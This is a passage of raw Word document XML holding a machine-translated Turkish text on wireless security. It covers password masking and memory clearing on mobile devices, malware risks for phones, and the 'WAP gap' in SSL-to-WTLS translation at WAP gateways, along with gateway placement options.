bileşenlerinin hafif versiyonlarını kullanır. Daha küçük işlemcileri kablosuz cihazlara yerleştirmek için, dijital sertifikalar ve bunlarla ilişkili ortak anahtarlar, kablosuz cihazda bulunan kaynaklara bağlı olarak, genellikle masaüstü Web tarayıcılarında dağıtılanlardan daha küçük veya daha zayıf olabil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8B38ED"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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.2.</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidRPr="00BA434F">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Gizlilik</w:t>
        </w:r>
      </w:hyperlink>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8B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kablosuz cihazlarda gizliliğin korunması, bazı ilginç zorluklar doğurur. Genellikle, bir tarayıcıyla bir Web sitesine eriştiğinde ve giriş yapmak için bir parola girdiğinde, diğerlerinin birinin ekranında gerçek parolayı görmesini engellemek için bir tür parola yıldız işaretleriyle veya başka bir yer tutucuyla gizlenir. Cep telefonlarında ve elde tutulan cihazlarda, parolanın maskelenmesi yazarken sorun yaratabilir. Cep telefonlarında, çoğu kullanıcı için zahmetli ve sıkıcı olan bir yöntem olan sayısal tuş takımını kullanarak harfler sık ​​sık giril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lastRenderedPageBreak/>
        <w:t>Gizliliğin korunmasındaki bir diğer zorluk, şifreler ve kredi kartı numaraları gibi gizli bilgilerin, kullanıldıktan sonra mobil cihazın hafızasından silinmesini sağlamaktır. Çoğu zaman, bu tür hassas bilgiler kablosuz Internet uygulaması tarafından değişkenler olarak depolanır ve daha sonra cihazın hafızasına önbelleğe alınır. Cep telefonlarının hafızasında kalan kredi kartı numaralarının, aynı sitelere erişmek için aynı telefonları ödünç alan diğer kişiler tarafından tekrar kullanılabileceği belgelenmiş durumlar olmuştur. Bir kez daha, uygulama tasarımcıları buradaki gizliliği korumakta baş mimarlar. Programcıların, kullanıcı bu uygulamayı kullanmayı bitirdiğinde mobil cihazın hassas bilgi hafızasını temizlemek için bir uygulama tasarlamaları önemlidir. Bu bilgilerin cihazın hafızasında bırakılması kullanıcının bir dahaki sefere tekrar girmek zorunda kalmasına izin vermese de, ilgili PIN veya şifreyi bir banka ATM kartına yazmak kadar risklid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Gizliliğin korunmasındaki bir başka zorluk da, kablosuz cihazdan İnternet'teki hedefine ve geriye dönerken hassas bilgilerin gizli kalmasını sağlamaktır. Geleneksel olarak, kablolu İnternet için çoğu Web sitesi, istemciden Web sunucusuna kadar tüm yolu şifrelemek için Güvenli Yuva Katmanı (SSL) veya halefi Transport Layer Security (TLS) kullanır. Bununla birlikte, birçok cep telefonu, özellikle cep telefonları, SSL'yi verimli bir şekilde çalıştırmak için hesaplama gücünden ve bant genişliğinden yoksundur. SSL'nin ana bileşenlerinden biri RSA ortak anahtar şifrelemesidir. Web sitesinde uygulanan şifreleme gücüne bağlı olarak, bu açık anahtar şifreleme biçimi işlemci ve bant genişliği yoğun olabilir ve mobil cihazı iletişim oturumunun kendisinin pratik olamayacak kadar yavaş olduğu noktaya kadar vergi uygulayabilir.</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5.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kötü Amaçlı Kod ve Virüsle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Kablosuz cihazlara yapılan güvenlik saldırılarının sayısı, iş istasyonlarına ve sunuculara yapılan saldırılara kıyasla küçüktü. Bunun nedeni, kısmen, çoğu mobil cihazın, özellikle cep telefonlarının, kötü niyetli kod ve virüslerin kullanabileceği yeterli işlemci, bellek veya depolamaya sahip olmamasıdır. Örneğin, günümüzde virüs yaymak için popüler bir yöntem, onları e-postalara ekli dosyalarda saklamaktır. Bununla birlikte, çoğu mobil cihaz, özellikle de cep telefonları, e-posta eklerini saklama veya açma yeteneğinden yoksundur. Bu, mobil cihazları hedef olarak göreceli olarak çekici kılmamaktadır çünkü hasar potansiyeli göreceli olarak düşüktür.</w:t>
      </w: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 xml:space="preserve">Bununla birlikte, mobil cihazlar hala saldırılara açık durumdadır ve daha fazla bilgi işlem, bellek ve depolama özellikleriyle geliştikçe gittikçe daha fazla hale gelecektir. Daha yüksek hızlarla, daha hızlı indirme yetenekleriyle ve daha iyi işlemlerle, mobil cihazlar yakında tüm sömürülebilir güvenlik açıklarıyla bugünkü iş istasyonlarının eşdeğeri olabilir. Bu bölümün yazılmasından itibaren, cep telefonu üreticileri, yeni nesil cep telefonlarının Java gibi dilleri destekleyeceğini, böylece kullanıcıların organizatör, hesap makinesi ve oyun gibi yazılım programlarını Web özellikli </w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>telefonlarına indirebileceklerini duyuruyorlardı. Bununla birlikte, olumsuz tarafta, kullanıcılar için farkında olmadan kötü niyetli programları (veya “kötü amaçlı yazılımları”) kendi cihazlarına indirmeleri için daha fazla fırsat açılır. Aşağıdaki atasözü mobil cihazlar için geçerlidir: “Ne kadar çok beyinleri olursa, hedef olarak o kadar çekici olurla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sidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>6. Güvenli Ağ Altyapı Bileşenleri</w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Nasıl?</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Bilgi güvenliği alanında çalışan birçoğumuzun bildiği gibi, güvenlik genellikle birçok bileşen kullanılarak kurulur, ancak genel gücü sadece en zayıf halkası kadar iyidir. Bazen biri ağ üzerinden mümkün olan en güçlü şifrelemeyi ve cihazlarda en güçlü doğrulamayı kullanmanın bir önemi yoktur. Zincir boyunca herhangi bir yerde zayıf bir bağlantı varsa, saldırganlar bu güvenlik açığına odaklanacak ve sonunda en az çabayı ve en az miktarda kaynak gerektiren bir yolu seçerek bundan faydalanabil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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kablosuz İnternet dünyası hala nispeten genç ve devam etmekte olan bir çalışma olduğu için, uyguladığı teknolojiye bağlı olarak güvenlik açıkları çok fazla. Bu bölüm, WAP (Kablosuz Uygulama Protokolü) kullananlar için bazı altyapı açıklarına odaklanmaktad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4"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00693A73"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6.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>“WAP'taki Boşluk”</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Şifreleme, E-ticaret dünyasında paha biçilmez bir araç olmuştur. Birçok çevrimiçi işletme, istemci ve Web sunucusu arasındaki İnternet işlemlerini korumak için uçtan uca şifreleme sağlamak için SSL (Güvenli Yuva Katmanı) veya TLS (Aktarım Katmanı Güvenliği) kullanır. Bununla birlikte, WAP kullanılırken, oturum için şifreleme etkinleştirilirse, her biri iletimin iki farklı yarısını koruyan genellikle iki şifreleme bölgesi uygulanır. SSL veya TLS, genellikle Web sunucusu ile daha önce belirtilen WAP ağ geçidi adı verilen önemli bir ağ cihazı arasındaki ilk yolu korumak için kullanılır. WTLS (Kablosuz Aktarım Katmanı Güvenliği), WAP ağ geçidi ve kablosuz mobil cihaz arasındaki ikinci yolu korumak için kullanıl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 xml:space="preserve">WAP ağ geçidi, kablolu sinyalleri kablosuz iletimlerle uyumlu, daha az bant genişliğine sahip yoğun ve sıkıştırılmış bir ikili biçime dönüştürmek için gereken bir altyapı bileşenidir. Bir oturum sırasında SSL gibi şifreleme kullanılırsa, WAP ağ geçidinin, bu SSL trafiğini şifresini çözerek ve WTLS ile yeniden şifreleyerek, diğer yönde ters şifreleyerek SSL korumalı iletimi çevirmesi gerekecektir. Bu çeviri sadece birkaç saniye sürebilir; ancak bu kısa süre zarfında, veriler şifresi çözülmüş WAP ağ </w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>geçidinin hafızasına ve ikinci protokol kullanılarak yeniden şifrelenmeden önce temiz bir şekilde oturur. WAP ağ geçidindeki bu kısa süre - bazıları “WAP'taki boşluk” olarak adlandırdı - sömürülebilir bir güvenlik açığıdır. WAP ağ geçidinin bulunduğu yere, ne kadar güvenli olduğuna ve onu korumaktan kimin sorumlu olduğuna bağlıd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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>WAP Ağ Geçidi Mimariler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Verilerin duyarlılığına ve izinsiz ifşa edilmesinin sorumluluğuna bağlı olarak, güvenli kablosuz uygulamalar sunan işletmelerin (ve bunun yanı sıra müşterileri), WAP ağ geçidinin nerede bulunduğu, nasıl korunduğu ve kimin koruduğu konusunda endişeleri olabilir. Üç olası mimariler ve bunların güvenlik etkileri incelenmişt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6.2.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Servis Sağlayıcıdaki WAP Ağ Geçid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Çoğu durumda, WAP ağ geçitleri kablosuz servis sağlayıcılarına aittir. Günümüzde güvenli kablosuz uygulamalar kullanan birçok işletme, SSL'den WTLS'ye şifreleme çevirisi yapmak için servis sağlayıcının WAP ağ geçidine güvenir. Bu, hassas kablosuz uygulamaların iş sahiplerinin yanı sıra kullanıcılarının da kablosuz servis sağlayıcılarına WAP ağ geçidini ve içinden geçen hassas verileri güvenli ve güvende tutmalarını emrettiğini gösterir. WAP ağ geçidinin servis sağlayıcının güvenli ortamında bulunduğu bir kurulum örneği sağlar. Şifreleme, kullanıcının cep telefonu ile işletme duvarının arkasındaki uygulama sunucusu arasındaki bir oturumda uygulanırsa, cep telefonu ile servis sağlayıcısının WAP ağ geçidi arasındaki yol genellikle WTLS kullanılarak şifrelenir. WAP gateway ile işletme ana bilgisayarının uygulama sunucusu arasındaki yol, SSL veya TLS kullanılarak şifrelen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Bununla birlikte, bu kurulumu kullanan güvenli WAP uygulamaları kullanan bir işletme, verilerin şifresinin çözüldüğü, kısa bir süre için açık bir metne maruz bırakıldığı ve daha sonra şifrelenmiş olduğu için uçtan uca güvenliği garanti edemeyeceğini anlamalıdır. kontrolden uzakta olan dış ağ geçidi. WAP ağ geçidi, genellikle kablosuz servis sağlayıcısının veri merkezinde bulunur ve doğrudan işletmelere karşı sorumlu olmayanlar tarafından katılır. Elbette, WAP ağ geçidini güvenli bir şekilde ve konumda tutmak, servis sağlayıcının yararınad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693A7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693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Bazen, bu güveni pekiştirmeye yardımcı olmak için işletmeler, risklerin en aza indirilmesini sağlamak için servis sağlayıcının WAP ağ geçitlerini işletmesinde periyodik güvenlik denetimleri yapmak isteyebilir. Bununla birlikte, bu yolu seçerek, işletmenin birçok WAP ağ geçidini birçok farklı servis sağlayıcıdan incelemesi gerekebileceğini unutmayın. Bir servis sağlayıcı, WAP ağ geçidini öncelikle kendi kablosuz telefon abonelerine İnternet erişimi sağlayacak şekilde ayarlar. Kullanıcılar </w:t>
      </w:r>
      <w:r w:rsidRPr="00693A73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bir işletmenin güvenli Web sitesine, örneğin dünyadaki 20 farklı kablosuz servis sağlayıcısından arama yapıyorsa, işletmenin bu 20 sağlayıcıya ait WAP ağ geçitlerini denetlemesi gerekebilir. Bu, ne yazık ki, zor bir görev ve güvenliği sağlamak için pratik bir yöntemdir. Her servis sağlayıcı kendi WAP ağ geçidini korumak için farklı bir yöntem uygulayabilir - eğer korunuyorsa. Ayrıca, çoğu durumda, kablosuz iletişim servis sağlayıcıları, sözleşmeye bağlı bir düzenleme olmadığı sürece, güvenli İnternet uygulamaları barındıran sayısız işletmeye değil, kendi cep telefonu abonelerine karşı sorumludurlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D32EA4" wp14:editId="65B13A1E">
            <wp:extent cx="4856019" cy="4038053"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="4096"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539" r="35061" b="16622"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4861853" cy="4042904"/>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D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servis sağlayıcıdaki WAP ağ geçid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2E6932"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6.2.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ana Bilgisayardaki WAP Ağ Geçidi</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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Özellikle finansal, sağlık ve devlet sektörlerinde olmak üzere bazı işletmeler ve kuruluşlar, müşterilerinin hassas verilerini korumada tutmak için yasal gereksinimlere sahip olabilir. Bu hassas verilerin kurumun iç kontrolünün dışında kalması gereksiz bir risk ve yükümlülük teşkil edebilir. Bazılarına göre, “WAP'taki boşluk”, sadece sömürülmeyi bekleyen açık bir gizlilik ihlali olan kırılmış bir boru hattı sunuyor. Bu tür bir ihlali kabul edilemez bulmuş olanlar için, olası bir çözüm, kablosuz servis sağlayıcısının WAP ağ geçidini tamamen geçerek, WAP ağ geçidini iş sahibinin kendi korumalı ağına yerleştirmektir. Sekil 2, böyle bir kurulumun bir örneğini sunar. Nokia, Ericsson ve Ariel İletişim bu tür bir çözüm sunan satıcılardan sadece birkaçıd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2E6932"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2E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bu yaklaşım, WAP ağ geçidini ve WTLSSSL çeviri sürecini, güvenli Web uygulamaları sağlayan aynı kurumun sınırları içinde, güvenilir bir yerde tutmanın yararına sahiptir. Bu kurulumu kullanarak, kullanıcılar genellikle doğrudan kablosuz cihazlarından, servis sağlayıcılarının Genel Anahtarlamalı Telefon Ağı (PSTN) üzerinden ve işletmenin kendi Uzaktan Erişim Sunucuları (RAS) üzerinden arama yaparlar. RAS'a ulaştıklarında, iletim WAP ağ geçidinde devam eder ve daha sonra, iş sahibinin kendi güvenli ortamı içindeki tüm bu cihazların uygulamasına veya Web sunucusuna iletilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0F8A5B" wp14:editId="7E3BAFC1">
            <wp:extent cx="4724400" cy="3835352"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4097" name="Resim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424" t="13254" r="34206" b="8278"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4729348" cy="3839369"/>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D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> :Ana bilgisayardaki WAP ağ geçidi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="002E6932"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2E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Baştan sona daha iyi güvenlik sağlasa da, bu yaklaşımın sakıncası, işletme sahibinin modemleri ve RAS bankalarını kurması ve böylece kullanıcıların çevirmek için yeterli erişim noktasına sahip olmaları gerektiğidir. İşletmenin kullanıcıları yeniden yapılandırması gerekir 'Cep telefonları ve PDA'lar doğrudan işletmeye işaret eder' tipik olarak servis sağlayıcının yerine kendi WAP ağ geçidine. Ancak, tüm cep telefonları kullanıcı tarafından bu yapılandırmaya izin vermez. Ayrıca, bazı cep telefonları yalnızca bir WAP ağ geçidine işaret ederken, diğerleri birden fazla kişiye işaret edecek kadar şanslı. Her iki durumda da, tüm bu kablosuz aygıtları, işletmenin kendi WAP ağ geçidini gösterecek şekilde tek tek yapılandırmak, önemli ölçüde zaman ve çaba gerektirebil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2E6932"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2E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Cep telefonları yalnızca tek bir WAP ağ geçidine işaret edebilen kullanıcılar için bu düzenleme başka bir sorunu daha ortaya koymaktadır. Bu kullanıcılar şimdi İnternet'teki diğer WAP sitelerine erişmek istiyorsa, yine de işletme ana bilgisayarının WAP ağ geçidi üzerinden geçmeleri gerekir. Eğer ana bilgisayar Internet'e giden trafiğe izin veriyorsa, ana bilgisayar kendi WAP ağ geçidine işaret etmek için yeni yapılandırılmış olan bu kullanıcılar için bir İnternet servis sağlayıcısı (ISS) olur. Bir geçici ISS olarak hareket eden, ev sahibi kaçınılmaz olarak birçok işletme için gereken önemli kaynaklar nedeniyle istenmeyen bir yük olabileceği hizmet ve kullanıcı ile ilgili konulara katılmaya ihtiyaç duyacakt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lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>6.2.3.S</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>ervis Sağlayıcı’nın WAP Ağ Geçidind</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>en Host’un WAP Proxy'sine Geçiş</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2E6932"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2E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Uçtan uca güvenli şifreli işlemler sağlamak isteyen ancak kendi WAP ağ geçitlerini kurmanın idari zorluklarından kaçınmak isteyen işletmeler için başka yaklaşımlar da </w:t>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">var. Sekil </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6932">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
